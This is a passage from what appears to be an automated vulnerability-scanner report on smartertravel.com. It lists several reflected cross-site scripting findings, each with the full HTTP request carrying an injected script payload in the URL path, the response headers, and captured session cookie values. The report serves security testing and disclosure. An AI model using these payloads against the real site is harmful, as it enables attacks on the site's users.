Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:07 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:56:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare6e8d9<script>alert(1)</script>b586d97e9f6/Learn-taxes-fees-increase.html</p>
...[SNIP]...

2.4. http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/Learn-taxes-fees-increase.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ee76<script>alert(1)</script>a20a20a29f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare/Learn-taxes-fees-increase.html8ee76<script>alert(1)</script>a20a20a29f5 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:58:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:58:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:58:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare/Learn-taxes-fees-increase.html8ee76<script>alert(1)</script>a20a20a29f5</p>
...[SNIP]...

2.5. http://www.smartertravel.com/airfare/directory/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/directory/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa538<script>alert(1)</script>358e8218be8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfareaa538<script>alert(1)</script>358e8218be8/directory/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:02:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:03:01 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:03:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:03:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfareaa538<script>alert(1)</script>358e8218be8/directory/</p>
...[SNIP]...

2.6. http://www.smartertravel.com/airfare/directory/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/directory/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11412<script>alert(1)</script>3ac58b4667e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare/directory11412<script>alert(1)</script>3ac58b4667e/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:03:07 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:03:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:03:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare/directory11412<script>alert(1)</script>3ac58b4667e/</p>
...[SNIP]...

2.7. http://www.smartertravel.com/airfare/schedules/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/schedules/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fffc8<script>alert(1)</script>73dfd853269 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfarefffc8<script>alert(1)</script>73dfd853269/schedules/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:40:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:45 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:40:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfarefffc8<script>alert(1)</script>73dfd853269/schedules/</p>
...[SNIP]...

2.8. http://www.smartertravel.com/airfare/schedules/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/schedules/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59976<script>alert(1)</script>e87e1f28ec3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare/schedules59976<script>alert(1)</script>e87e1f28ec3/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:40:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:51 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:40:51 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:40:51 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare/schedules59976<script>alert(1)</script>e87e1f28ec3/</p>
...[SNIP]...

2.9. http://www.smartertravel.com/airfare/search/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/search/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d702<script>alert(1)</script>a5a3f1b50f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare1d702<script>alert(1)</script>a5a3f1b50f3/search/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:27:14 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:27:14 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:27:14 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare1d702<script>alert(1)</script>a5a3f1b50f3/search/</p>
...[SNIP]...

2.10. http://www.smartertravel.com/airfare/search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /airfare/search/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f3d5<script>alert(1)</script>d7fceb807bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /airfare/search1f3d5<script>alert(1)</script>d7fceb807bc/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:29:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:29:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:29:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:29:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/airfare/search1f3d5<script>alert(1)</script>d7fceb807bc/</p>
...[SNIP]...

2.11. http://www.smartertravel.com/ajax/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /ajax/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 449dd<script>alert(1)</script>d3d2e917324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax449dd<script>alert(1)</script>d3d2e917324/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 20:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:59:47 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 20:59:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 20:59:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/ajax449dd<script>alert(1)</script>d3d2e917324/</p>
...[SNIP]...

2.12. http://www.smartertravel.com/blogs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2102f<script>alert(1)</script>fcec8a82390 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs2102f<script>alert(1)</script>fcec8a82390/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
